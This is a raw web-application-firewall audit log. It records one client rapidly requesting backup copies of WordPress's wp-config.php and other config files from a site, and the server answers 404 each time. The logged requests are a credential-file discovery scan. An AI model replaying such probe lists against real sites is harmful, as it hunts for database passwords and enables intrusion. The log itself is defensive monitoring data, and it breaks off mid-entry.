--1a82191f-B-- GET /wp-config.php.bak1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1a82191f-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --1a82191f-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.bak1"] [unique_id "aE3UO-k-MTQZUjwklQN1GAAAAAg"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.bak1' not found or unable to stat Stopwatch: 1749931067041715 3379 (- - -) Stopwatch2: 1749931067041715 3379; combined=1889, p1=370, p2=1461, p3=0, p4=0, p5=58, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1a82191f-Z-- --47e79c4d-A-- [15/Jun/2025:01:27:47.161293 +0530] aE3UOzV1wc8MD9ZPjDFaCgAAAAM 185.177.72.108 49388 127.0.0.1 7081 --47e79c4d-B-- GET /wp-config.php.bk HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --47e79c4d-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --47e79c4d-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.bk"] [unique_id "aE3UOzV1wc8MD9ZPjDFaCgAAAAM"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.bk' not found or unable to stat Stopwatch: 1749931067157697 3673 (- - -) Stopwatch2: 1749931067157697 3673; combined=2144, p1=469, p2=1600, p3=0, p4=0, p5=75, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --47e79c4d-Z-- --3407da66-A-- [15/Jun/2025:01:27:47.276108 +0530] aE3UOyUp1gCWWDzKyjSL_QAAAAs 185.177.72.108 49404 127.0.0.1 7081 --3407da66-B-- GET /wp-config.php.cust HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3407da66-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --3407da66-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.cust"] [unique_id "aE3UOyUp1gCWWDzKyjSL_QAAAAs"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.cust' not found or unable to stat Stopwatch: 1749931067273301 2868 (- - -) Stopwatch2: 1749931067273301 2868; combined=1620, p1=368, p2=1196, p3=0, p4=0, p5=56, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3407da66-Z-- --53485736-A-- [15/Jun/2025:01:27:47.391792 +0530] aE3UO0MAAEyWrtlsmo2MtQAAAAc 185.177.72.108 49410 127.0.0.1 7081 --53485736-B-- GET /wp-config.php.disabled HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --53485736-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --53485736-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.disabled"] [unique_id "aE3UO0MAAEyWrtlsmo2MtQAAAAc"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.disabled' not found or unable to stat Stopwatch: 1749931067388916 2930 (- - -) Stopwatch2: 1749931067388916 2930; combined=1658, p1=364, p2=1236, p3=0, p4=0, p5=57, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --53485736-Z-- --77bfd949-A-- [15/Jun/2025:01:27:47.506875 +0530] aE3UO1j2r5sYBjRDYxhz5wAAAAU 185.177.72.108 49426 127.0.0.1 7081 --77bfd949-B-- GET /wp-config.php.new HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --77bfd949-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --77bfd949-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.new"] [unique_id "aE3UO1j2r5sYBjRDYxhz5wAAAAU"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.new' not found or unable to stat Stopwatch: 1749931067503980 2952 (- - -) Stopwatch2: 1749931067503980 2952; combined=1689, p1=413, p2=1222, p3=0, p4=0, p5=53, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --77bfd949-Z-- --69645d30-A-- [15/Jun/2025:01:27:47.622530 +0530] aE3UO-k-MTQZUjwklQN1GQAAAAg 185.177.72.108 49440 127.0.0.1 7081 --69645d30-B-- GET /wp-config.php.orig HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --69645d30-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --69645d30-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.orig"] [unique_id "aE3UO-k-MTQZUjwklQN1GQAAAAg"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.orig' not found or unable to stat Stopwatch: 1749931067619060 3525 (- - -) Stopwatch2: 1749931067619060 3525; combined=1773, p1=348, p2=1371, p3=0, p4=0, p5=54, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --69645d30-Z-- --80975d57-A-- [15/Jun/2025:01:27:47.737994 +0530] aE3UOyUp1gCWWDzKyjSL_gAAAAs 185.177.72.108 49466 127.0.0.1 7081 --80975d57-B-- GET /wp-config.php.original HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --80975d57-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --80975d57-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.original"] [unique_id "aE3UOyUp1gCWWDzKyjSL_gAAAAs"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.original' not found or unable to stat Stopwatch: 1749931067734548 3513 (- - -) Stopwatch2: 1749931067734548 3513; combined=2036, p1=435, p2=1530, p3=0, p4=0, p5=71, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --80975d57-Z-- --c0219f75-A-- [15/Jun/2025:01:27:47.852737 +0530] aE3UO0MAAEyWrtlsmo2MtgAAAAc 185.177.72.108 49476 127.0.0.1 7081 --c0219f75-B-- GET /wp-config.php.swn HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c0219f75-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c0219f75-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.swn"] [unique_id "aE3UO0MAAEyWrtlsmo2MtgAAAAc"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.swn' not found or unable to stat Stopwatch: 1749931067849848 2943 (- - -) Stopwatch2: 1749931067849848 2943; combined=1715, p1=345, p2=1312, p3=0, p4=0, p5=58, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c0219f75-Z-- --86fac45e-A-- [15/Jun/2025:01:27:47.967635 +0530] aE3UO1j2r5sYBjRDYxhz6AAAAAU 185.177.72.108 49480 127.0.0.1 7081 --86fac45e-B-- GET /wp-config.php.swo HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --86fac45e-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --86fac45e-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.swo"] [unique_id "aE3UO1j2r5sYBjRDYxhz6AAAAAU"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/sarainternational.ae/httpdocs/wp-config.php.swo' not found or unable to stat Stopwatch: 1749931067964610 3079 (- - -) Stopwatch2: 1749931067964610 3079; combined=1647, p1=383, p2=1206, p3=0, p4=0, p5=58, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --86fac45e-Z-- --16afce0c-A-- [15/Jun/2025:01:27:48.082534 +0530] aE3UPOk-MTQZUjwklQN1GgAAAAg 185.177.72.108 49486 127.0.0.1 7081 --16afce0c-B-- GET /wp-config.php_ HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --16afce0c-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --16afce0c-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php_"] [unique_id "aE3UPOk-MTQZUjwklQN1GgAAAAg"] Stopwatch: 1749931068079392 3206 (- - -) Stopwatch2: 1749931068079392 3206; combined=1887, p1=376, p2=1456, p3=0, p4=0, p5=55, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --16afce0c-Z-- --c10b3264-A-- [15/Jun/2025:01:27:48.199142 +0530] aE3UPCUp1gCWWDzKyjSL_wAAAAs 185.177.72.108 49490 127.0.0.1 7081 --c10b3264-B-- GET /wp-config.php_1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c10b3264-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c10b3264-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php_1"] [unique_id "aE3UPCUp1gCWWDzKyjSL_wAAAAs"] Stopwatch: 1749931068195975 3233 (- - -) Stopwatch2: 1749931068195975 3233; combined=1854, p1=397, p2=1396, p3=0, p4=0, p5=60, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c10b3264-Z-- --a095446b-A-- [15/Jun/2025:01:27:48.313604 +0530] aE3UPEMAAEyWrtlsmo2MtwAAAAc 185.177.72.108 49502 127.0.0.1 7081 --a095446b-B-- GET /wp-config.php_bak HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a095446b-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a095446b-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php_bak"] [unique_id "aE3UPEMAAEyWrtlsmo2MtwAAAAc"] Stopwatch: 1749931068310782 2874 (- - -) Stopwatch2: 1749931068310782 2874; combined=1644, p1=356, p2=1236, p3=0, p4=0, p5=52, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a095446b-Z-- --c5c16705-A-- [15/Jun/2025:01:27:48.428351 +0530] aE3UPDV1wc8MD9ZPjDFaDAAAAAM 185.177.72.108 49522 127.0.0.1 7081 --c5c16705-B-- GET /wp-config.php_new HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c5c16705-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c5c16705-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php_new"] [unique_id "aE3UPDV1wc8MD9ZPjDFaDAAAAAM"] Stopwatch: 1749931068425496 2907 (- - -) Stopwatch2: 1749931068425496 2907; combined=1644, p1=395, p2=1196, p3=0, p4=0, p5=53, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c5c16705-Z-- --21550b6a-A-- [15/Jun/2025:01:27:48.543831 +0530] aE3UPJOn_2b0s5j3TtOJlgAAAAY 185.177.72.108 49544 127.0.0.1 7081 --21550b6a-B-- GET /wp-config.php_Old HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --21550b6a-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --21550b6a-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php_Old"] [unique_id "aE3UPJOn_2b0s5j3TtOJlgAAAAY"] Stopwatch: 1749931068540357 3527 (- - -) Stopwatch2: 1749931068540357 3527; combined=2092, p1=420, p2=1619, p3=0, p4=0, p5=53, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --21550b6a-Z-- --be61647b-A-- [15/Jun/2025:01:27:48.659258 +0530] aE3UPOh_Rdu0duNoj2H4fgAAAAo 185.177.72.108 49566 127.0.0.1 7081 --be61647b-B-- GET /config.bak HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --be61647b-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --be61647b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/config.bak"] [unique_id "aE3UPOh_Rdu0duNoj2H4fgAAAAo"] Stopwatch: 1749931068656158 3178 (- - -) Stopwatch2: 1749931068656158 3178; combined=1836, p1=395, p2=1374, p3=0, p4=0, p5=66, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --be61647b-Z-- --1dcf8026-A-- [15/Jun/2025:01:27:49.184165 +0530] aE3UPZf90d3VSj3QpDNzewAAAAQ 185.177.72.108 49604 127.0.0.1 7081 --1dcf8026-B-- GET /config.dat HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1dcf8026-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --1dcf8026-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".dat"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".dat"] [severity "CRITICAL"] 